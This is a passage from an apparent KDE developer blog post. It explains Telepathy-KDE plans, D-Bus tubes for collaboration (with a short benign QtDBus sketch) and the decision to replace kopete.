In the future, other components could be added, such as a logger daemon that logs all your chats into files or a database, and of course it will be very simple to add collaboration features to other applications for doing anything with your contacts. For example, krdc already has telepathy integration, and it is possible that if someone requests over telepathy to share their desktop with you, you could use krdc to view their desktop, without caring about firewalls or anything. Unfortunately, the server side of this is currently only implemented in gnome, so only a user using gnome can currently share their desktop with you, but that will be fixed in the future.

As a sidenote here, telepathy also allows you to share D-Bus connections over the IM network, which makes it extremely easy to add collaboration features to an application that has no idea about networks or protocols. With this feature, called D-Bus tubes, all you have to do in your application is expose a D-Bus interface, which will be called from the remote side using normal D-Bus calls, as if the other side were running on the same computer. With this feature, we could add collaboration features to many KDE applications very easily in the future. Unfortunately, this currently requires a patch in Qt that has not been merged yet, and it is not yet certain if it will make it into Qt 4.8 (which could kill the whole feature, but we can still hope it will be in Qt 4.8, so that we can start using it in KDE 4.7 or 4.8).
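
To illustrate the idea, here is a minimal sketch of the application side; the GameBoard class and object path are hypothetical, and how the tube’s private connection reaches the application is glossed over. Only the QtDBus calls are real API:

#include <QtCore/QObject>
#include <QtDBus/QDBusConnection>

// Any slots exposed here become callable by the remote peer over the
// tube, exactly as if the peer were a local D-Bus client.
class GameBoard : public QObject
{
    Q_OBJECT
public slots:
    void moveMade(int from, int to)
    {
        // apply the move received from the remote player
    }
};

// Telepathy hands the application a private D-Bus connection once the
// tube is established; exporting an object on it is plain QtDBus.
void exportOverTube(QDBusConnection tube)
{
    tube.registerObject(QLatin1String("/board"), new GameBoard,
                        QDBusConnection::ExportAllSlots);
}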

To get to kopete now: as you realize, there is not much place for kopete in all this. So, as soon as we merge all this into the KDE SC, kopete is going to go away. All in all, it has not received much development in the last years, and even many of its former maintainers are now looking towards Telepathy-KDE, so I don’t think we have any reason to keep it around. In addition, kopete’s code is not very reusable in its current form, so we are not going to use it at all. Many people have said that this may be a bad idea, but we have actually tried to port code from kopete and it didn’t really work, so we decided to do a new implementation from scratch.

I hope that pretty much explains everything now. Let’s stop talking about kopete and let’s start working on Telepathy-KDE!

PS: If you want to get involved with it, come and find us on irc in #kde-telepathy on irc.freenode.net.